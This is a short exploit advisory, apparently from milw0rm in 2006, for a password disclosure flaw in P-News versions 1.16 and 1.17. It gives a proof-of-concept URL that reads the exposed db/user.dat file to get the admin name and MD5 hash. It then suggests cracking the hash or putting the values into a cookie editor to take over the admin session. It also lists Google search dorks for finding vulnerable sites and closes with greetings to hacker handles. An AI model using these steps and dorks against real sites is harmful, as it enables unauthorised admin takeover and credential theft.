#P-News (user.dat)Remote Password Disclosure Vulnerablity #
#S.name:P-News #
#Affected versions:1.17 and 1.16 #
#Vendor:www.ppopn.net #
#Risk:Very Highly Critical #
#Author:Dr Max Virus #
#Location:Egypt #
#POC: #
#http:/[target]/[path]/db/user.dat #
#As We see Admin name and hash !!!!!!!!!!!!!!!!!!!!!!!!!! #
#You can crack the password with any md5 encrypt #
#Or u can register and inject the info in any cookie editor can be in FireFox or Opera #
#Dorks: #
#V1.16; #
#allintitle:"P-news ver. 1.16" #
#V1.17; #
#powered by P-News 1.17 #
#Thx:str0ke-koray-Timq-r0ut3r-mTk-nuffsaid-MrSwan-All Friends #
#Special Gr33ts:AsianEagle-Kacper-The master-Hotturk #
# milw0rm.com [2006-12-31]